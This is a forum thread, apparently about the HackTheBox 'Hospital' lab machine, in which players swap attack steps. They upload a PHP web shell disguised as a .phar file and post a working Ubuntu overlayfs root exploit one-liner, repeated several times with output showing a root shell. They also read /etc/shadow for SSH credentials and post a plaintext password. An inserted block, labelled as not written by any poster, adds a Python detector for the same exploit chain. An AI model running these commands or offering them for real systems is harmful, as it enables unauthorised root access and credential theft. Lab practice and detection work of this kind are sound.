HTB - Hospital
by take1312 - Saturday November 18, 2023 at 06:51 PM
#11
(Nov 18, 2023, 08:52 PM)theart42 Wrote:
(Nov 18, 2023, 08:33 PM)take1312 Wrote:
(Nov 18, 2023, 08:31 PM)peRd1 Wrote:
(Nov 18, 2023, 08:21 PM)take1312 Wrote:
(Nov 18, 2023, 08:14 PM)bigdwarf123 Wrote: I'm able to upload .ps1 files but when I access them at /uploads/shell.ps1 they don't execute, the browser just prints the script in clear text. Anyone know what to do about that?

(Nov 18, 2023, 08:17 PM)theart42 Wrote: same for me.
I can also upload php as .phar and it is run when I call /uploads/cmd.phar, but it is really limited in what it can do...

https://github.com/flozz/p0wny-shell
use this shell as .phar
Then stabilize your shell...

yes you can find mysql creds and after reverse shell enter it

there are two ips if you look at the interfaces.
192.168.5.1
192.168.5.2

I saw them, and assume we're in a docker container of sorts
still looking to become a doctor in the container...

I don't think this is a docker container, if this was a docker container there would be a .dockerenv file
Reply
#12
get root in the limited shell/ container
via


unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;

setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
Reply
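
Added example, not written by any poster in this thread: a defender-side check that flags the pattern in the command quoted above (user namespace via unshare, a set*id file capability, an overlay mount) when it shows up in process-execution telemetry from a non-root account. The record format (`pid=`, `uid=`, `cmd=`) and the sample records are constructed for illustration, and the matching is a heuristic, not a complete detection.

```python
import re

# Indicators drawn from the command quoted in this thread: a user namespace
# opened with unshare, a set*id file capability granted inside it, and an
# overlay mount whose copy-up carries that capability to the upper directory.
INDICATORS = {
    "userns": re.compile(r"\bunshare\s+(?:-\S+\s+)*?(?:-[a-zA-Z]*[rU][a-zA-Z]*|--map-root-user|--user)\b"),
    "setcap": re.compile(r"\bsetcap\s+\S*cap_set[ug]id"),
    "overlay": re.compile(r"\bmount\b[^;&|]*-t\s+overlay\b"),
    "setuid0": re.compile(r"\bset(?:e|res)?uid\(\s*0"),
}
CHAIN = {"userns", "setcap", "overlay"}
LINE = re.compile(r"^pid=(\d+) uid=(\d+) cmd=(.*)$")

def classify(cmd):
    """Return (severity, matched indicator names) for one command line."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(cmd)}
    if CHAIN <= hits:
        return "high", sorted(hits)
    if "setuid0" in hits or len(hits) >= 2:
        return "review", sorted(hits)
    return None, sorted(hits)

def scan(lines):
    """Return alerts for non-root processes; root legitimately mounts overlays."""
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m.group(2) == "0":
            continue
        severity, hits = classify(m.group(3))
        if severity:
            alerts.append({"pid": int(m.group(1)), "uid": int(m.group(2)),
                           "severity": severity, "hits": hits})
    return alerts

# Constructed sample records (hypothetical format: pid, uid, command line).
SAMPLE_LOG = """\
pid=1201 uid=33 cmd=unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;"
pid=1202 uid=33 cmd=u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
pid=1310 uid=0 cmd=mount -t overlay overlay -o lowerdir=/a,upperdir=/b,workdir=/c /merged
pid=1422 uid=1000 cmd=unshare -m sh -c 'ls -r /tmp'
""".splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The web-server account (uid 33 in the constructed records) running all three chain indicators in one command line is the high-confidence case; a lone `setuid(0)` call from a non-root process is queued for review.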
#13
(Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via


unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;

setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'

Ubuntu POC game overlay shit works.
Reply
#14
(Nov 18, 2023, 09:39 PM)peRd1 Wrote:
(Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via


unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;

setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'

Ubuntu POC game overlay shit works.

which one did you use? 

https://www.reddit.com/r/selfhosted/comm...e20232640/
Reply
#15
(Nov 18, 2023, 09:43 PM)VfV Wrote:
(Nov 18, 2023, 09:37 PM)take1312 Wrote: get root in the limited shell/ container
via


unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;

setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'

It's exiting right after running that command.
bash: cannot set terminal process group (968): Inappropriate ioctl for device
bash: no job control in this shell
root@webserver:/var/www/html/uploads# exit

root@webserver:/var/www/html/uploads# exit

you were root already. congratz it's running for you. my machine was reverted and can't get it working again. if you find something keep me posted please
Reply
#16
got drwilliams ssh credentials
Reply
#17
(Nov 18, 2023, 09:58 PM)take1312 Wrote: got drwilliams ssh credentials

in all the github/go folders?
Reply
#18
(Nov 18, 2023, 10:12 PM)chillywilly Wrote:
(Nov 18, 2023, 09:58 PM)take1312 Wrote: got drwilliams ssh credentials

in all the github/go folders?
/etc/shadow
Reply
#19
password is

qwe123!@#

gl folks I'm out, machine reverting every 10 mins. damn apes
Reply
#20
Hello, I need a nudge for foothold user
Reply

